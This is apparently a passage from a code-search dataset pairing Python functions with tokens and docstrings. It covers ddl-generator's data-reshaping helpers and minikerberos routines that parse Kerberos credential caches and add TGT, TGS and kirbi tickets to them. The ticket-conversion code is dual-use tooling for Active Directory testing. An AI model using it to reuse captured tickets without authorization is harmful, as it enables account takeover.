"in",
"parent",
":",
"try",
":",
"for",
"(",
"key",
",",
"val",
")",
"in",
"row",
".",
"items",
"(",
")",
":",
"if",
"hasattr",
"(",
"val",
",",
"'items'",
")",
":",
"unnest_child_dict",
"(",
"parent",
"=",
"row",
",",
"key",
"=",
"key",
",",
"parent_name",
"=",
"parent_name",
")",
"elif",
"isinstance",
"(",
"val",
",",
"list",
")",
"or",
"isinstance",
"(",
"val",
",",
"tuple",
")",
":",
"# force listed items to be dicts, not scalars",
"row",
"[",
"key",
"]",
"=",
"[",
"v",
"if",
"hasattr",
"(",
"v",
",",
"'items'",
")",
"else",
"{",
"key",
":",
"v",
"}",
"for",
"v",
"in",
"val",
"]",
"except",
"AttributeError",
":",
"raise",
"TypeError",
"(",
"'Each row should be a dictionary, got %s: %s'",
"%",
"(",
"type",
"(",
"row",
")",
",",
"row",
")",
")",
"for",
"(",
"key",
",",
"val",
")",
"in",
"row",
".",
"items",
"(",
")",
":",
"if",
"isinstance",
"(",
"val",
",",
"list",
")",
"or",
"isinstance",
"(",
"val",
",",
"tuple",
")",
":",
"for",
"child",
"in",
"val",
":",
"field_names_used_by_children",
"[",
"key",
"]",
".",
"update",
"(",
"set",
"(",
"child",
".",
"keys",
"(",
")",
")",
")",
"for",
"(",
"child_name",
",",
"names_in_use",
")",
"in",
"field_names_used_by_children",
".",
"items",
"(",
")",
":",
"if",
"not",
"parent",
".",
"pk",
":",
"parent",
".",
"assign_pk",
"(",
")",
"for",
"fk_name",
"in",
"possible_fk_names",
":",
"if",
"fk_name",
"not",
"in",
"names_in_use",
":",
"break",
"else",
":",
"raise",
"Exception",
"(",
"\"Cannot find unused field name in %s.%s to use as foreign key\"",
"%",
"(",
"parent_name",
",",
"child_name",
")",
")",
"child_fk_names",
"[",
"child_name",
"]",
"=",
"fk_name",
"for",
"row",
"in",
"parent",
":",
"if",
"child_name",
"in",
"row",
":",
"for",
"child",
"in",
"row",
"[",
"child_name",
"]",
":",
"child",
"[",
"fk_name",
"]",
"=",
"row",
"[",
"parent",
".",
"pk",
".",
"name",
"]",
"children",
"[",
"child_name",
"]",
".",
"append",
"(",
"child",
")",
"row",
".",
"pop",
"(",
"child_name",
")",
"# TODO: What if rows have a mix of scalar / list / dict types?",
"return",
"(",
"parent",
",",
"parent",
".",
"pk",
".",
"name",
"if",
"parent",
".",
"pk",
"else",
"None",
",",
"children",
",",
"child_fk_names",
")"
] | For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child | [
"For",
"each",
"key",
"in",
"each",
"row",
"of",
"data",
"(",
"which",
"must",
"be",
"a",
"list",
"of",
"dicts",
")",
"unnest",
"any",
"dict",
"values",
"into",
"parent",
"and",
"remove",
"list",
"values",
"into",
"separate",
"lists",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L263-L318 |
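A minimal usage sketch for unnest_children (the import path follows the repository layout above; the sample data, parent_name, and resulting key names are invented for illustration):

    from ddlgenerator.reshape import unnest_children

    data = [{'name': 'Ann', 'pets': [{'species': 'cat'}, {'species': 'dog'}]}]
    parent, pk_name, children, child_fk_names = unnest_children(data, parent_name='person', force_pk=True)
    # children['pets'] now holds the extracted child rows, each stamped with the
    # foreign key named in child_fk_names['pets'] that points back to its parent row.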
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | ParentTable.suitability_as_key | def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) | python | def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) | [
"def",
"suitability_as_key",
"(",
"self",
",",
"key_name",
")",
":",
"pk_values",
"=",
"all_values_for",
"(",
"self",
",",
"key_name",
")",
"if",
"not",
"pk_values",
":",
"return",
"(",
"'absent'",
",",
"int",
")",
"# could still use it",
"key_type",
"=",
"type",
"(",
"th",
".",
"best_coercable",
"(",
"pk_values",
")",
")",
"num_unique_values",
"=",
"len",
"(",
"set",
"(",
"pk_values",
")",
")",
"if",
"num_unique_values",
"<",
"len",
"(",
"pk_values",
")",
":",
"return",
"(",
"False",
",",
"None",
")",
"# non-unique",
"if",
"num_unique_values",
"==",
"len",
"(",
"self",
")",
":",
"return",
"(",
"True",
",",
"key_type",
")",
"# perfect!",
"return",
"(",
"'partial'",
",",
"key_type",
")"
] | Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys | [
"Returns",
":",
"(",
"result",
"key_type",
")",
"result",
"is",
"True",
"False",
"or",
"absent",
"or",
"partial",
"(",
"both",
"still",
"usable",
")",
"key_type",
"is",
"int",
"for",
"integer",
"keys",
"or",
"str",
"for",
"hash",
"keys"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L220-L236 |
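The return contract is easy to illustrate with a standalone sketch of the same decision logic (a simplification: the type of the first value stands in for th.best_coercable):

    def classify_key(values, row_count):
        # absent -> usable, duplicated -> unusable, unique-and-complete -> perfect,
        # unique-but-missing-in-some-rows -> partial (mirrors suitability_as_key)
        if not values:
            return ('absent', int)
        if len(set(values)) < len(values):
            return (False, None)
        if len(set(values)) == row_count:
            return (True, type(values[0]))
        return ('partial', type(values[0]))

    assert classify_key([1, 2, 3], 3) == (True, int)
    assert classify_key([1, 1], 2) == (False, None)
    assert classify_key([1, 2], 3) == ('partial', int)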
skelsec/minikerberos | minikerberos/ccache.py | Header.parse | def parse(data):
"""
returns a list of header tags
"""
reader = io.BytesIO(data)
headers = []
while reader.tell() < len(data):
h = Header()
h.tag = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.taglen = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.tagdata = reader.read(h.taglen)
headers.append(h)
return headers | python | def parse(data):
"""
returns a list of header tags
"""
reader = io.BytesIO(data)
headers = []
while reader.tell() < len(data):
h = Header()
h.tag = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.taglen = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.tagdata = reader.read(h.taglen)
headers.append(h)
return headers | [
"def",
"parse",
"(",
"data",
")",
":",
"reader",
"=",
"io",
".",
"BytesIO",
"(",
"data",
")",
"headers",
"=",
"[",
"]",
"while",
"reader",
".",
"tell",
"(",
")",
"<",
"len",
"(",
"data",
")",
":",
"h",
"=",
"Header",
"(",
")",
"h",
".",
"tag",
"=",
"int",
".",
"from_bytes",
"(",
"reader",
".",
"read",
"(",
"2",
")",
",",
"byteorder",
"=",
"'big'",
",",
"signed",
"=",
"False",
")",
"h",
".",
"taglen",
"=",
"int",
".",
"from_bytes",
"(",
"reader",
".",
"read",
"(",
"2",
")",
",",
"byteorder",
"=",
"'big'",
",",
"signed",
"=",
"False",
")",
"h",
".",
"tagdata",
"=",
"reader",
".",
"read",
"(",
"h",
".",
"taglen",
")",
"headers",
".",
"append",
"(",
"h",
")",
"return",
"headers"
] | returns a list of header tags | [
"returns",
"a",
"list",
"of",
"header",
"tags"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L29-L41 |
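A self-contained check of the tag/length/data layout Header.parse expects; the byte string is fabricated and the import path is assumed from the repository layout:

    from minikerberos.ccache import Header  # assumed import path

    raw = b'\x00\x01\x00\x02\xab\xcd'  # tag=1, taglen=2, tagdata=b'\xab\xcd'
    headers = Header.parse(raw)
    assert headers[0].tag == 1
    assert headers[0].tagdata == b'\xab\xcd'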
skelsec/minikerberos | minikerberos/ccache.py | Credential.to_tgt | def to_tgt(self):
"""
Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format
"""
enc_part = EncryptedData({'etype': 1, 'cipher': b''})
tgt_rep = {}
tgt_rep['pvno'] = krb5_pvno
tgt_rep['msg-type'] = MESSAGE_TYPE.KRB_AS_REP.value
tgt_rep['crealm'] = self.server.realm.to_string()
tgt_rep['cname'] = self.client.to_asn1()[0]
tgt_rep['ticket'] = Ticket.load(self.ticket.to_asn1()).native
tgt_rep['enc-part'] = enc_part.native
t = EncryptionKey(self.key.to_asn1()).native
return tgt_rep, t | python | def to_tgt(self):
"""
Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format
"""
enc_part = EncryptedData({'etype': 1, 'cipher': b''})
tgt_rep = {}
tgt_rep['pvno'] = krb5_pvno
tgt_rep['msg-type'] = MESSAGE_TYPE.KRB_AS_REP.value
tgt_rep['crealm'] = self.server.realm.to_string()
tgt_rep['cname'] = self.client.to_asn1()[0]
tgt_rep['ticket'] = Ticket.load(self.ticket.to_asn1()).native
tgt_rep['enc-part'] = enc_part.native
t = EncryptionKey(self.key.to_asn1()).native
return tgt_rep, t | [
"def",
"to_tgt",
"(",
"self",
")",
":",
"enc_part",
"=",
"EncryptedData",
"(",
"{",
"'etype'",
":",
"1",
",",
"'cipher'",
":",
"b''",
"}",
")",
"tgt_rep",
"=",
"{",
"}",
"tgt_rep",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"tgt_rep",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_AS_REP",
".",
"value",
"tgt_rep",
"[",
"'crealm'",
"]",
"=",
"self",
".",
"server",
".",
"realm",
".",
"to_string",
"(",
")",
"tgt_rep",
"[",
"'cname'",
"]",
"=",
"self",
".",
"client",
".",
"to_asn1",
"(",
")",
"[",
"0",
"]",
"tgt_rep",
"[",
"'ticket'",
"]",
"=",
"Ticket",
".",
"load",
"(",
"self",
".",
"ticket",
".",
"to_asn1",
"(",
")",
")",
".",
"native",
"tgt_rep",
"[",
"'enc-part'",
"]",
"=",
"enc_part",
".",
"native",
"t",
"=",
"EncryptionKey",
"(",
"self",
".",
"key",
".",
"to_asn1",
"(",
")",
")",
".",
"native",
"return",
"tgt_rep",
",",
"t"
] | Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format | [
"Returns",
"the",
"native",
"format",
"of",
"an",
"AS_REP",
"message",
"and",
"the",
"sessionkey",
"in",
"EncryptionKey",
"native",
"format"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L102-L118 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_tgt | def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a successful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | python | def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a successful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | [
"def",
"add_tgt",
"(",
"self",
",",
"as_rep",
",",
"enc_as_rep_part",
",",
"override_pp",
"=",
"True",
")",
":",
"#from AS_REP",
"c",
"=",
"Credential",
"(",
")",
"c",
".",
"client",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"as_rep",
"[",
"'cname'",
"]",
",",
"as_rep",
"[",
"'crealm'",
"]",
")",
"if",
"override_pp",
"==",
"True",
":",
"self",
".",
"primary_principal",
"=",
"c",
".",
"client",
"c",
".",
"server",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"enc_as_rep_part",
"[",
"'sname'",
"]",
",",
"enc_as_rep_part",
"[",
"'srealm'",
"]",
")",
"c",
".",
"time",
"=",
"Times",
".",
"from_asn1",
"(",
"enc_as_rep_part",
")",
"c",
".",
"key",
"=",
"Keyblock",
".",
"from_asn1",
"(",
"enc_as_rep_part",
"[",
"'key'",
"]",
")",
"c",
".",
"is_skey",
"=",
"0",
"#not sure!",
"c",
".",
"tktflags",
"=",
"TicketFlags",
"(",
"enc_as_rep_part",
"[",
"'flags'",
"]",
")",
".",
"cast",
"(",
"core",
".",
"IntegerBitString",
")",
".",
"native",
"c",
".",
"num_address",
"=",
"0",
"c",
".",
"num_authdata",
"=",
"0",
"c",
".",
"ticket",
"=",
"CCACHEOctetString",
".",
"from_asn1",
"(",
"Ticket",
"(",
"as_rep",
"[",
"'ticket'",
"]",
")",
".",
"dump",
"(",
")",
")",
"c",
".",
"second_ticket",
"=",
"CCACHEOctetString",
".",
"empty",
"(",
")",
"self",
".",
"credentials",
".",
"append",
"(",
"c",
")"
] | Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a successful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file | [
"Creates",
"credential",
"object",
"from",
"the",
"TGT",
"and",
"adds",
"to",
"the",
"ccache",
"file",
"The",
"TGT",
"is",
"basically",
"the",
"native",
"representation",
"of",
"the",
"asn1",
"encoded",
"AS_REP",
"data",
"that",
"the",
"AD",
"sends",
"upon",
"a",
"succsessful",
"TGT",
"request",
".",
"This",
"function",
"doesn",
"t",
"do",
"decryption",
"of",
"the",
"encrypted",
"part",
"of",
"the",
"as_rep",
"object",
"it",
"is",
"expected",
"that",
"the",
"decrypted",
"XXX",
"is",
"supplied",
"in",
"enc_as_rep_part",
"override_pp",
":",
"bool",
"to",
"determine",
"if",
"client",
"principal",
"should",
"be",
"used",
"as",
"the",
"primary",
"principal",
"for",
"the",
"ccache",
"file"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L465-L489 |
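A hedged sketch of where add_tgt sits in a client flow; as_rep and enc_as_rep_part are assumed to be the native dicts produced by an AS exchange and its decryption, which this excerpt does not show:

    from minikerberos.ccache import CCACHE  # assumed import path

    def cache_tgt(as_rep, enc_as_rep_part, out_path='victim.ccache'):
        # inputs: native dicts from a decrypted AS exchange (assumed to exist)
        cc = CCACHE()
        cc.add_tgt(as_rep, enc_as_rep_part)  # also sets the primary principal by default
        cc.to_file(out_path)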
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_tgs | def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | python | def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | [
"def",
"add_tgs",
"(",
"self",
",",
"tgs_rep",
",",
"enc_tgs_rep_part",
",",
"override_pp",
"=",
"False",
")",
":",
"#from AS_REP",
"c",
"=",
"Credential",
"(",
")",
"c",
".",
"client",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"tgs_rep",
"[",
"'cname'",
"]",
",",
"tgs_rep",
"[",
"'crealm'",
"]",
")",
"if",
"override_pp",
"==",
"True",
":",
"self",
".",
"primary_principal",
"=",
"c",
".",
"client",
"c",
".",
"server",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"enc_tgs_rep_part",
"[",
"'sname'",
"]",
",",
"enc_tgs_rep_part",
"[",
"'srealm'",
"]",
")",
"c",
".",
"time",
"=",
"Times",
".",
"from_asn1",
"(",
"enc_tgs_rep_part",
")",
"c",
".",
"key",
"=",
"Keyblock",
".",
"from_asn1",
"(",
"enc_tgs_rep_part",
"[",
"'key'",
"]",
")",
"c",
".",
"is_skey",
"=",
"0",
"#not sure!",
"c",
".",
"tktflags",
"=",
"TicketFlags",
"(",
"enc_tgs_rep_part",
"[",
"'flags'",
"]",
")",
".",
"cast",
"(",
"core",
".",
"IntegerBitString",
")",
".",
"native",
"c",
".",
"num_address",
"=",
"0",
"c",
".",
"num_authdata",
"=",
"0",
"c",
".",
"ticket",
"=",
"CCACHEOctetString",
".",
"from_asn1",
"(",
"Ticket",
"(",
"tgs_rep",
"[",
"'ticket'",
"]",
")",
".",
"dump",
"(",
")",
")",
"c",
".",
"second_ticket",
"=",
"CCACHEOctetString",
".",
"empty",
"(",
")",
"self",
".",
"credentials",
".",
"append",
"(",
"c",
")"
] | Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file | [
"Creates",
"credential",
"object",
"from",
"the",
"TGS",
"and",
"adds",
"to",
"the",
"ccache",
"file",
"The",
"TGS",
"is",
"the",
"native",
"representation",
"of",
"the",
"asn1",
"encoded",
"TGS_REP",
"data",
"when",
"the",
"user",
"requests",
"a",
"tgs",
"to",
"a",
"specific",
"service",
"principal",
"with",
"a",
"valid",
"TGT",
"This",
"function",
"doesn",
"t",
"do",
"decryption",
"of",
"the",
"encrypted",
"part",
"of",
"the",
"tgs_rep",
"object",
"it",
"is",
"expected",
"that",
"the",
"decrypted",
"XXX",
"is",
"supplied",
"in",
"enc_as_rep_part",
"override_pp",
":",
"bool",
"to",
"determine",
"if",
"client",
"principal",
"should",
"be",
"used",
"as",
"the",
"primary",
"principal",
"for",
"the",
"ccache",
"file"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L491-L515 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_kirbi | def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well then impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | python | def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well then impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | [
"def",
"add_kirbi",
"(",
"self",
",",
"krbcred",
",",
"override_pp",
"=",
"True",
",",
"include_expired",
"=",
"False",
")",
":",
"c",
"=",
"Credential",
"(",
")",
"enc_credinfo",
"=",
"EncKrbCredPart",
".",
"load",
"(",
"krbcred",
"[",
"'enc-part'",
"]",
"[",
"'cipher'",
"]",
")",
".",
"native",
"ticket_info",
"=",
"enc_credinfo",
"[",
"'ticket-info'",
"]",
"[",
"0",
"]",
"c",
".",
"client",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"ticket_info",
"[",
"'pname'",
"]",
",",
"ticket_info",
"[",
"'prealm'",
"]",
")",
"if",
"override_pp",
"==",
"True",
":",
"self",
".",
"primary_principal",
"=",
"c",
".",
"client",
"#yaaaaay 4 additional weirdness!!!!",
"#if sname name-string contains a realm as well htne impacket will crash miserably :(",
"if",
"len",
"(",
"ticket_info",
"[",
"'sname'",
"]",
"[",
"'name-string'",
"]",
")",
">",
"2",
"and",
"ticket_info",
"[",
"'sname'",
"]",
"[",
"'name-string'",
"]",
"[",
"-",
"1",
"]",
".",
"upper",
"(",
")",
"==",
"ticket_info",
"[",
"'srealm'",
"]",
".",
"upper",
"(",
")",
":",
"logging",
".",
"debug",
"(",
"'SNAME contains the realm as well, trimming it'",
")",
"t",
"=",
"ticket_info",
"[",
"'sname'",
"]",
"t",
"[",
"'name-string'",
"]",
"=",
"t",
"[",
"'name-string'",
"]",
"[",
":",
"-",
"1",
"]",
"c",
".",
"server",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"t",
",",
"ticket_info",
"[",
"'srealm'",
"]",
")",
"else",
":",
"c",
".",
"server",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"ticket_info",
"[",
"'sname'",
"]",
",",
"ticket_info",
"[",
"'srealm'",
"]",
")",
"c",
".",
"time",
"=",
"Times",
".",
"from_asn1",
"(",
"ticket_info",
")",
"c",
".",
"key",
"=",
"Keyblock",
".",
"from_asn1",
"(",
"ticket_info",
"[",
"'key'",
"]",
")",
"c",
".",
"is_skey",
"=",
"0",
"#not sure!",
"c",
".",
"tktflags",
"=",
"TicketFlags",
"(",
"ticket_info",
"[",
"'flags'",
"]",
")",
".",
"cast",
"(",
"core",
".",
"IntegerBitString",
")",
".",
"native",
"c",
".",
"num_address",
"=",
"0",
"c",
".",
"num_authdata",
"=",
"0",
"c",
".",
"ticket",
"=",
"CCACHEOctetString",
".",
"from_asn1",
"(",
"Ticket",
"(",
"krbcred",
"[",
"'tickets'",
"]",
"[",
"0",
"]",
")",
".",
"dump",
"(",
")",
")",
"#kirbi only stores one ticket per file",
"c",
".",
"second_ticket",
"=",
"CCACHEOctetString",
".",
"empty",
"(",
")",
"self",
".",
"credentials",
".",
"append",
"(",
"c",
")"
] | if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return | [
"if",
"ticket_info",
"[",
"endtime",
"]",
"<",
"datetime",
".",
"datetime",
".",
"now",
"(",
"datetime",
".",
"timezone",
".",
"utc",
")",
":",
"if",
"include_expired",
"==",
"True",
":",
"logging",
".",
"debug",
"(",
"This",
"ticket",
"has",
"most",
"likely",
"expired",
"but",
"include_expired",
"is",
"forcing",
"me",
"to",
"add",
"it",
"to",
"cache!",
"This",
"can",
"cause",
"problems!",
")",
"else",
":",
"logging",
".",
"debug",
"(",
"This",
"ticket",
"has",
"most",
"likely",
"expired",
"skipping",
")",
"return"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L518-L557 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.get_all_tgt | def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts | python | def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which tickets are AS_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts | [
"def",
"get_all_tgt",
"(",
"self",
")",
":",
"tgts",
"=",
"[",
"]",
"for",
"cred",
"in",
"self",
".",
"credentials",
":",
"if",
"cred",
".",
"server",
".",
"to_string",
"(",
")",
".",
"lower",
"(",
")",
".",
"find",
"(",
"'krbtgt'",
")",
"!=",
"-",
"1",
":",
"tgts",
".",
"append",
"(",
"cred",
".",
"to_tgt",
"(",
")",
")",
"return",
"tgts"
] | Returns a list of AS_REP tickets in native format (dict).
